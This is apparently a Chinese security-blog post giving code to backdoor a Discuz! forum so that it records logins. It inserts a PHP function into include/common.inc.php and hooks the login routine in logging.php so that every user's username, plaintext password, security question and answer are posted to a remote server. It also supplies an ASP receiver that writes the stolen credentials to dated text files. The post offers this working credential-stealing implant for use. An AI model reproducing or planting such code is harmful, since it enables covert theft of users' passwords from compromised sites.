http://www.80pentest.com/?p=835
DZ记录密码,我自己做了份代码。
include/common.inc.php 里面插一个自定义函数。
我选择放在 41-53行。dz7.1-72 include/login.func.php (49-51行) | dz7.0 是在根目录的logging.php
01 | function request_by_other( $remote_server , $post_string ){ |
05 | 'header' => 'Content-type: application/x-www-form-urlencoded' . "/r/n" . |
06 | 'User-Agent : xxbing/'s fuckyou!!!' . "/r/n" . |
07 | 'Content-length: ' . strlen ( $post_string )+8, |
08 | 'content' => 'mypost=' . $post_string ) |
10 | $stream_context = stream_context_create( $context ); |
11 | $data = file_get_contents ( $remote_server ,FALSE, $stream_context ); |
找到根目录下的 logging.php文件。搜索下面代码。
1 | $ucresult = uc_user_login( $username , $password , $loginfield == 'uid' ); |
然后在后面插上下面的代码:
2 | $showtime = gmdate ( "Ynj H:i:s" ,time()+8*3600); |
7 | $post_string = 'name1=' . $name2 . '&name=' . $username . '&password=' . $password . '&questionid=' . $questionid . '&answer=' . $answer . '&showtime=' . $showtime . '&from=' . $_SERVER [ 'SERVER_NAME' ]; |
因为我熟悉asp,所以接受端我用asp写的。
asp代码如下:
03 | 'body0 = request.form( "name1" ) |
04 | body1 = request.form( "name" ) |
05 | body2 = request.form( "password" ) |
06 | body3 = request.form( "questionid" ) |
07 | body4 = request.form( "answer" ) |
08 | body5 = request.form( "showtime" ) |
09 | body7 = request.form( "from" ) |
10 | body6 = "账号:" &body1 & "---密码:" & body2 & "---问题ID:" & body3 & "---答案:" & body4 & "---时间:" & body5 & "---来源:" & body7 |
12 | FileName = date ()& ".txt" |
13 | '这里之所以要替换,是为了兼容IIS7的环境。 |
14 | FileName = Replace(FileName, "/" , "-" ) |
16 | Call CreateFile(body6,FileName) |
18 | Sub CreateFile(body,FileName) |
20 | Set fso = CreateObject( "Scripting.FileSystemObject" ) |
21 | Set tf = fso.openTextFile(server.mappath(FileName),8,True,0) |
23 | tf.WriteLine "----------------" |